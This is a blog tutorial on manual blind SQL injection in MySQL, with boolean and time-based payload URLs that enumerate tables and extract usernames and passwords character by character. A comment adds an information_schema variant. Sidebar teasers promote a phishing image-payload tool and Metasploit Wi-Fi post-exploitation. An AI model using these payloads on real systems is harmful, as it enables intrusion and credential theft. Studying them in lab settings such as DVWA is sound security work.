Skip to main content

MySQL: Blind Injection steps - Manually


While preparing for an upcoming presentation, I came across Blind SQL Injection. Following steps I found helpful and you might find it useful.

There are 2 types of Blind SQL Injections:
1. Normal Blind => Where you get TRUE/FALSE responses based on output of SQL query. This is visible change in page.
2. Totally Blind => No change in output for TRUE/FALSE condition.

1. Normal Blind:
Vulnerable URL:
hxxp://site/page.php?id=1

TRUE Response:
hxxp://site/page.php?id=1 AND 1=1

FALSE Response:
hxxp://site/page.php?id=1 AND 1=2

Check Version:
hxxp://site/page.php?id=1 AND substring(version(),1,1)=4 <-- br="" false="" response="">hxxp://site/page.php?id=1 AND substring(version(),1,1)=5 <-- br="" response="" true="">
Database version is MySQL 5.x.x.

Table & Columns:
We need to guess table & column names. For this, subselect should be supported.

Check subselect:
hxxp://site/page.php?id=1 AND (select 1)=1 <-- --="" be="" br="" response="" should="" subselect="" supported="" this="" true="">
Guessing Table name:
hxxp://site/page.php?id=1 AND (select 1 from admin limit 0,1)=1 <-- br="" false="">hxxp://site/page.php?id=1 AND (select 1 from users limit 0,1)=1 <-- br="" true="">
Table found 'users'.

Here we trying to get 1st row as 1, so when table exists, the query returns 1 and conditions is TRUE. When the table is not there, it's FALSE as there will be error in query execution which is not visible to us.

Guessing Columns:
hxxp://site/page.php?id=1 AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- br="" false="">hxxp://site/page.php?id=1 AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- br="" true="">
Column 'password' found.

Here we concating 1 with value from supplied column name & then check 1st char with substring(). If column exists, it'll return 1+(password value of 1st row) and substring will pull out 1st char which is '1' and comparing with 1 which will be TRUE. If column does not exists, it's return nothing, which FALSE the condition.

Data Mining:

We found table name as 'users' & columns as 'password' and 'username'.

hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>96 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>97 --> FALSE

This means 1st character is CHAR(97)='a'.

Here we are 1st concating username with password values for 1st row (Limit) which will be in formation like 'username:password' and then coverting 1st character of it in ascii and checking with numeric value. If response is TRUE, increase and check till get the first FALSE.

Now to know 2nd character, just increase the char in substring() and repeat the process.
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE

Second character is CHAR(100) = 'd'

The end of string will be TRUE for >0 condition. So you will come to know that you reached the end.

2. Totally Blind:
As this type didn't have any TRUE/FALSE responses, we need to use time-based injection. Use IF() for condition and BENCHMARK() for time delay. These 2 can be used with UNION SELECT, but again finding correct number of columns is pain as there is no direct method i know.

Detecting Version:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD 5(CHAR(1))),null),null ---> delay of 5 secs (TRUE)
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD 5(CHAR(1))),null),null ---> no delay (FALSE)
When the condition in IF() is TRUE, you can see a delay of few seconds in response as compared to the one when condition results in FALSE.

Table and column guessing:
As described in 'Normal Blind', the same process can be followed here to guess the table and column names.

Table name guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select 1 from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if table 'users' exists or no delay if not exists.

Column name Guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select substring(concat(1,pass),1,1) from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if column 'pass' exists or no delay if not exists.

Getting Data:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(user,1,1)=CHAR(97),BENCHMARK(5000000, MD5(CHAR(1))),null),null FROM users limit 0,1

Delay if first character of 1st row of 'user' column in 'users' table is 'a' or no delay if it's not.

This way we can mine data. As you seen, this is time consuming. Tools like SQLMap are really good at this type of operations. But it always good to know the basics before firing any tool. You can use DVWA Blind SQL Injection in 'Medium' security to test these attacks.

Hope this helps someone , someday, somewhere.
 Good. However, since the MySQL version is 5.x.x, you can take the help of information_schema to enumerate rather than guessing table names.

It need not always be users. To help you in this case,

Code:
hxxp://site.com/page.php?id=1 and ascii(substring((select group_concat(table_name) from information_schema.columns where column_name like 0x257061737325),1,1))>0
Enumerates all the table names with a column containing the string, "pass". Now, this should work even if the column name is, pass/passwd/password and so on.

Comments

Post a Comment

Popular posts from this blog

Top 20 Tools for hacking 2018

What are Hacking Tools? Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There is a variety of such tools available on the market. Some of them are open source while others are commercial solution. In this list we highlight the top 20 tools for Ethical Hacking of web applications, servers and networks 1)  Netsparker Netsparker  is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution. Features Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology. Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages. REST API for seamless integration with the SDLC, bug tracking systems etc. Fully scalable solution.
Post a Comment
Read more

EMBEDDED BACKDOOR WITH IMAGE USING FAKE IMAGE EXPLOITER

In this article we are introducing a newly launched hacking tool “ Fake Image Exploiter ”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it. Let’s start! Open the terminal inside your kali Linux and type following command to download it from github. Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git Once it gets downloaded then opens the folder and selects the file “ settings ” for configuration before running the program as shown the given screenshot. Now made some changes inside setting file as shown the screenshot: Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set  PAYLOAD_EXETNSION=bat  similarly set  BYPASS_RH=NO   and scroll down for next configration. In same way set these two values also as show
Post a Comment
Read more

Wifi Post Exploitation on Remote PC

Hello readers! Today you will be learning about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too. First Hack the Victim PC Using Metasploit ( tutorial how to hack remote pc ) after that get admin access through Bypassuac ( click here ), once you have victim’s meterpreter session run given below post exploit  one-by-one.  Get BSS information of a remote user’s Wi-Fi connection This module gathers information about the wireless Basic Service Sets available to the victim machine. e.g. this will give you SSID and other important  information regarding wireless connection. msf > use post/windows/wlan/wlan_bss_list msf post( wlan_bss_list ) > set session 5 msf post( wlan_bss_list ) > exploit From given below image you can observe that here it has found “5 networks” suc
Post a Comment
Read more